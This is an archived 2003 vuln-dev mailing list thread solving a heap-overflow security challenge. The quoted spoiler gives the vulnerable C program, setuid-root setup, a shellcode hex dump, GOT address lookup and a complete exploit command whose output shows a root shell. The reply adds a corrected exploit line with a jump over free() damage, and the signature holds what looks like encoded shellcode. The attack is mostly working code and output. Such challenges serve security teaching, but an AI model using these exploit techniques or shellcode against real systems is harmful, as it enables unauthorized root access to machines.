This *almost* worked for me, but not quite. After figuring out the correct addresses to substitute, I was still getting segfaults. After some playing I tried the following, which worked for me: ./vuln1 `printf "\xeb\x0c"``perl -e 'print "A"x204;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"` Adding the "\xeb\x0c" jumps over the damage done by free() at p1+8. I'm not sure I understand yet how it could have worked for you without the jump. My free() damage was a call into bad memory, maybe yours was somehow something less disruptive? Thanks very much Jose for posting this spoiler, and thanks Dave McKinney and Aaron Adams for posing this challenge to the list. As a newcomer I have learned more in one day today about exploits than I have in the past 2 months of watching this list. Cameron -----Original Message----- From: Jose Ronnick [mailto:matrixat_private] Sent: Tuesday, May 13, 2003 6:23 PM To: vuln-devat_private Subject: Re: vulndev1.c solution (warning SPOILER) Man.. someone's gotta show you guys how it's done... If you want to solve it yourself, don't read any further.. matrix@overdose vuln-dev $ cat vulndev1.c // vulndev-1.c // vuln-dev mailing list security challenge #1 // by Aaron Adams <aadamsat_private> // Spot the error in this program. #include <stdio.h> #include <stdlib.h> #define SIZE 252 int main(int argc, char *argv[]) { int i; char *p1, *p2; char *buf1 = malloc(SIZE); char *buf2 = malloc(SIZE); if (argc != 3) exit(1); p1 = argv[1], p2 = argv[2]; printf("p1 is at %p\n", p1); // DEBUG strncpy(buf2, p2, SIZE); for (i = 0; i <= SIZE && p1[i] != '\0'; i++) buf1[i] = p1[i]; free(buf1); free(buf2); return 0; } matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c matrix@overdose vuln-dev $ sudo chown root.root ./vuln1 matrix@overdose vuln-dev $ sudo chmod u+s ./vuln1 matrix@overdose vuln-dev $ objdump -R ./vuln1 ./vuln1: file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 08049654 R_386_GLOB_DAT __gmon_start__ 0804963c R_386_JUMP_SLOT malloc 08049640 R_386_JUMP_SLOT __libc_start_main 08049644 R_386_JUMP_SLOT printf 08049648 R_386_JUMP_SLOT exit 0804964c R_386_JUMP_SLOT free 08049650 R_386_JUMP_SLOT strncpy matrix@overdose vuln-dev $ pcalc 0x4c-12 64 0x40 0y1000000 matrix@overdose vuln-dev $ od -ch shell 0000000 1 300 260 F 1 333 1 311 315 200 353 026 [ 1 300 210 c031 46b0 db31 c931 80cd 16eb 315b 88c0 0000020 C \a 211 [ \b 211 C \f 260 \v 215 K \b 215 S \f 0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53 0000040 315 200 350 345 377 377 377 / b i n / s h 80cd e5e8 ffff 2fff 6962 2f6e 6873 0000056 matrix@overdose vuln-dev $ wc -c shell 46 shell matrix@overdose vuln-dev $ pcalc 252-46 206 0xce 0y11001110 matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"` p1 is at 0xbffff839 Segmentation fault matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"` p1 is at 0xbffff839 sh-2.05b# id uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio) sh-2.05b# questions? comments? >=) -- %JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXq v-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ- yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPP PPPPPPPPPPPPPPPPPPP
This archive was generated by hypermail 2b30 : Wed May 14 2003 - 08:34:28 PDT